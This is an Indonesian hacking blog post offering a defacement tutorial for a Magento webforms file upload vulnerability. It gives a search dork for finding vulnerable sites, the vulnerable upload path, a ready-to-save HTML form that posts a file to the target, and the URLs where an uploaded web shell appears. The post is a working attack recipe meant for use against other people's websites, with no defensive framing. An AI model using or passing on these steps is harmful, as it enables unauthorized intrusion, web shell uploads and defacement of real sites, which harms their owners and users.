Home Deface Hacking Tutorial Tutorial Deface "Magento File Upload Vulnerabilty"

Jumat, 21 Oktober 2016

Tutorial Deface "Magento File Upload Vulnerabilty"

Diterbitkan
Tags


Dork: inurl:js/webforms/
Prof : /js/webforms/upload/index.php
Site Vuln : []

CSRF (NotePad Save x.Html)
<form method="POST" action="https://site.Target.com/js/webforms/upload/index.php" enctype="multipart/form-data"> <input type="file" name="files[]" /><button>Upload</button> </form>

Cek hasil Shell/txt

https://site.target.com/js/webforms/upload/files/[random]/urshell.php

Or https://site.target.com/js/webforms/upload/files/[random]/x.txt

Artikel Terkait

Lobang Dot ID

Next Post
Previous Post
Comments
0 Comments


EmoticonEmoticon

Langganan: Posting Komentar (Atom)